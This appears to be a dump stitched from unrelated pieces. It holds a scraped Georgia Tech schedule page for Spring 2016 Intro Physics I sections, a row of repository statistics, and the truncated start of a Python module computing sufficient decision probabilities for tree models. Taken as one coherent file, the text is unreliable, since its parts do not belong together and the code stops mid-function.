<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30977">Intro Physics I - 30977 - PHYS 2211 - M07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30978">Intro Physics I - 30978 - PHYS 2211 - M08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22492">Intro Physics I - 22492 - PHYS 2211 - N</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211N
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">8:05 am - 8:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Michael F Schatz (<abbr title="Primary">P</abbr>)<a href="mailto:michael.schatz@physics.gatech.edu" target="Michael F. Schatz"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 152</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Michael F Schatz (<abbr title="Primary">P</abbr>)<a href="mailto:michael.schatz@physics.gatech.edu" target="Michael F. Schatz"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22500">Intro Physics I - 22500 - PHYS 2211 - N01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22501">Intro Physics I - 22501 - PHYS 2211 - N02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22502">Intro Physics I - 22502 - PHYS 2211 - N03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22505">Intro Physics I - 22505 - PHYS 2211 - N04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22503">Intro Physics I - 22503 - PHYS 2211 - N05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22504">Intro Physics I - 22504 - PHYS 2211 - N06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30975">Intro Physics I - 30975 - PHYS 2211 - N07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
</></table>
<br>
<table class="datadisplaytable" summary="This is for formatting of the bottom links." width="50%">
<><tr>
<td class="ntdefault">
<a href="javascript:history.go(-1)" onmouseover="window.status='Return to Previous'; return true" onfocus="window.status='Return to Previous'; return true" onmouseout="window.status=''; return true" onblur="window.status=''; return true">Return to Previous</a>
</td>
</tr>
</></table>
<!-- ** START OF twbkwbis.P_CloseDoc ** -->
<table class="plaintable" summary="This is table displays line separator at end of the page." width="100%" cellspacing="0" cellpadding="0" border="0"><><tr><td class="bgtabon" width="100%" colspan="2"><img src="/wtlgifs/web_transparent.gif" alt="Transparent Image" class="headerImg" title="Transparent Image" name="web_transparent" hspace="0" vspace="0" border="0" height="3" width="10"></td></tr></table>
<a href="#top" onmouseover="window.status='Skip to top of page'; return true" onmouseout="window.status=''; return true" onfocus="window.status='Skip to top of page'; return true" onblur="window.status=''; return true" class="skiplinks">Skip to top of page</a>
</div>
""")
| 45.859847 | 638 | 0.71536 | 18,079 | 113,870 | 4.447923 | 0.024172 | 0.045701 | 0.103664 | 0.091327 | 0.963477 | 0.962656 | 0.9614 | 0.957433 | 0.957433 | 0.956513 | 0 | 0.043144 | 0.087486 | 113,870 | 2,482 | 639 | 45.878324 | 0.730752 | 0 | 0 | 0.966949 | 0 | 0.120919 | 0.999833 | 0.415351 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
9172f89c7bc11605aa428a86afdb7ae7a673d056 | 22,957 | py | Python | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | import numpy as np
import itertools
from tqdm import tqdm
from multiprocessing import Pool
from functools import partial
def compute_sdp_reg(X, tX, model, S, data):
N = X.shape[0]
index = list(range(X.shape[1]))
if len(S) == len(index):
return np.ones(N)
elif S == []:
return np.zeros(N)
n_trees = len(model.trees)
y_pred = model.predict(data)
fX = model.predict(X)
mean_forest = np.zeros((N, 3))
for b in range(n_trees):
for l in range(n_trees):
if b == l:
leaves_tree = model.partition_leaves_trees[b]
for leaf_numb in range(model.leaves_nb[b]):
leaf_part = leaves_tree[leaf_numb]
leaf_id = model.leaf_idx_trees[b, leaf_numb]
value = model.values[b, leaf_id]
leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S],
axis=0)
if np.sum(leaf_bool) == 0:
continue
lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index],
axis=0)
p_s = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in
S], axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
dist = (y_pred - fX[i]) ** 2
up_tx = np.array(dist > tX).reshape(-1)
down_tx = np.array(dist <= tX).reshape(-1)
# p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm) * value ** 2) / (p_ss) if p_ss != 0 else 0
mean_forest[i, 0] -= (2 * fX[i] * np.sum(lm) * value) / (p_ss) if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * up_tx) * value ** 2) / (
p_su) if p_su != 0 else 0
mean_forest[i, 1] -= (2 * fX[i] * np.sum(lm * up_tx) * value) / (
p_su) if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * down_tx) * value ** 2) / (
p_sd) if p_sd != 0 else 0
mean_forest[i, 2] -= (2 * fX[i] * np.sum(lm * down_tx) * value) / (
p_sd) if p_sd != 0 else 0
else:
for leaf_numb_b in range(model.leaves_nb[b]):
leaf_id_b = model.leaf_idx_trees[b, leaf_numb_b]
for leaf_numb_l in range(model.leaves_nb[l]):
leaf_id_l = model.leaf_idx_trees[l, leaf_numb_l]
leaf_part_b = model.partition_leaves_trees[b][leaf_numb_b]
value_b = model.values[b, leaf_id_b]
leaf_part_l = model.partition_leaves_trees[l][leaf_numb_l]
value_l = model.values[l, leaf_id_l]
leaf_bool = np.prod([(X[:, s] <= leaf_part_b[s, 1]) * (X[:, s] >= leaf_part_b[s, 0]) *
(X[:, s] <= leaf_part_l[s, 1]) * (X[:, s] >= leaf_part_l[s, 0])
for s in S], axis=0)
if np.sum(leaf_bool) == 0.:
continue
lm = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
(data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
for s in index], axis=0)
p_s = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
(data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
for s in S], axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
dist = (y_pred - fX[i]) ** 2
up_tx = np.array(dist > tX).reshape(-1)
down_tx = np.array(dist <= tX).reshape(-1)
# p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm) * value_b * value_l) / (
p_ss) if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * up_tx) * value_b * value_l) / (
p_su) if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * down_tx) * value_b * value_l) / (
p_sd) if p_sd != 0 else 0
num = mean_forest[:, 1] - mean_forest[:, 0]
den = mean_forest[:, 1] - mean_forest[:, 2]
sdp = np.true_divide(num, den, out=np.zeros(N), where=den != 0)
return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_reg_cat(X, tX, model, S, data):
N = X.shape[0]
index = list(range(X.shape[1]))
if len(S) == len(index):
return np.ones(N)
elif S == []:
return np.zeros(N)
n_trees = len(model.trees)
y_pred = model.predict(data)
fX = model.predict(X)
mean_forest = np.zeros((N, 3))
for b in range(n_trees):
for l in range(n_trees):
if b == l:
leaves_tree = model.partition_leaves_trees[b]
# leaves_tree = model.partition_leaves_trees[l]
for leaf_numb in range(model.leaves_nb[b]):
leaf_part = leaves_tree[leaf_numb]
leaf_id = model.leaf_idx_trees[b, leaf_numb]
value = model.values[b, leaf_id]
leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S],
axis=0)
if np.sum(leaf_bool) == 0:
continue
lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index],
axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
dist = (y_pred - fX[i]) ** 2
up_tx = np.array(dist > tX).reshape(-1)
down_tx = np.array(dist <= tX).reshape(-1)
